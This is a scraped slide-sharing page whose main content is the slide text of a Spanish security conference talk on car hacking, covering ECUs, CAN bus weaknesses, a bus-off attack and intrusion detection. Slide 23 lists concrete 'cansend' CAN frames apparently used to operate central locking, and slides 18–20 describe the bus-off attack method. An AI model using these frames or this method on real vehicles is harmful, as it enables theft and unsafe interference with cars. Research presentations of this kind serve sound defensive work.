Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Recently uploaded

Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 

Recently uploaded (20)

Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 

Carlos Sahuquillo - Car Hacking: de Angelina Jolie a Charlize Theron [rootedvlc2018]

  • 1. 1 Car Hacking: De Angelina Jolie a Charlize Theron
  • 2. 2 Los mecánicos de toda la vida
  • 3. 3 Los mecánicos de toda la vida
  • 4. 4 Los mecánicos de toda la vida
  • 6. 6 ¿Qué es una ECU? • An ECU is an embedded system that controls/monitors systems in a car. • Combination of ECUs is known as the cars computer. • The cars “computer” is not one system but a large number of small subsystems connected together by a network.
  • 7. 7 ¿Qué es una ECU? • More than 80 ECUs in a car. • Each ECU (Electronic Control Unit) connected in car represents a separate point of vulnerability to a cyber attack. • If one ECU is compromised, it’s a gateway to every other ECU in the vehicle. • Terabytes of data travel between vehicles, cloud networks, wearables and mobile devices, and, obviously they represent a desirable target for cybercriminals.
  • 8. 8 ¿Qué es una ECU? • The CAN bus is a 30-year old architecture. CAN contains numerous vulnerabilities that are inherent in its design. • Lack of segmentation and Boundary Defense. • Lack of Device Authentication. • Unencrypted Traffic. • Security by obscurity is not security at all
  • 10. 10
  • 11. 11
  • 12. 12 Evolución de las amenazas Early hacks Recent hacks
  • 13. 13 Evolución de las amenazas • Hackers Can steal a Tesla Model S in seconds by cloning its key fob: https://www.wired.com/story/hackers-steal-tesla-model-s-seconds-key-fob/
  • 14. 14 Evolución de las amenazas • A Dutch first: Ingenious BMW theft attempt: https://mrooding.me/a- dutch-first-ingenious-bmw-theft-attempt-5f7f49a96ec8
  • 18. 18 Bus-off attack • Fault tolerance • 5 errors Bit error, Stuff error, CRC error, Form error, ACK error • Counters – TEC: transmit error counter – REC: receive error counter error-active bus-off error-passive TEC > 127 | REC > 127 TEC < 128 & REC < 128 TEC > 255 Reset | 128x11 recessive bits
  • 19. 19 Bus-off attack 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 1 0 1 0 1 0 1 0 1 0 0 1 0 1 1 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 0
  • 20. 20 Bus-off attack • Attack conditions –Same ID –Same time –Different data 0x107 8 0x08 0xA0 0xFE 0x04 0x80 0x00 0x00 0x04 0x107 8 0x08 0x80 0xFE 0x04 0x80 0x00 0x00 0x04 0 0 0 0 1 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1 0 0 0 1 0 0 0 0 0 0 Error raised TEC1 + 8 Error raised TEC2 + 8 TEC = 128 0 0 0 0 1 0 0 0 1 0 1 0 0 0 0 1 0 0 0 1 0 0 0 1 , , , Error raised TEC1 + 8 TEC2 - 1 TEC1 = 255 Bus-off
  • 23. 23 Central locking cansend can0 184#61A40A0009000200 cansend can0 366#0010001E80030000 cansend can0 184#2F51050118000200 cansend can0 366#0010001E80030000
  • 26. 26 Park assistant • Parking operation ~ 1min – 60.000 can messages – 150 IDs ID Byte 0 Byte 1 Byte 2 Byte 3 Byte 4 Byte 5 Byte 6 Byte 7 130 EB 6A 16 00 06 00 04 80 130 8F 6B 16 00 06 00 04 80 130 9C 6C 16 00 06 00 04 80 130 CB 6D 15 00 06 00 04 80 130 01 6E 13 00 06 00 04 80 130 A2 6F 11 00 06 00 04 80 130 C5 61 0E 00 06 00 04 80
  • 33. 33 No parece que vaya a dejar de utilizarse http://eecatalog.com/automotive/2013/03/13/automotive-communication-protocols-preparing-for-the- future/
  • 34. 34 Cómo podemos protegernos • IDPS: Real Time Detection and Neutralization – CANBUS Packet Inspection – Context Analysis – Detects malicious CAN messages using ML algorithms – Zero days detection (based on behavior) – Low delay to manage the HUGE amount of data
  • 35. 35 Agradecimientos • A XXXX: por anular la garantía del coche cuando fuimos la primera vez con una ECU brickeada:
  • 36. 36
  • 37. 37 Muchas gracias Carlos Sahuquillo Pascual Automotive CyberSecurity Consultant @csahuqui on Twitter https://sahuquillo.org Igor Robles Puente Automotive CyberSecurity Research Engineer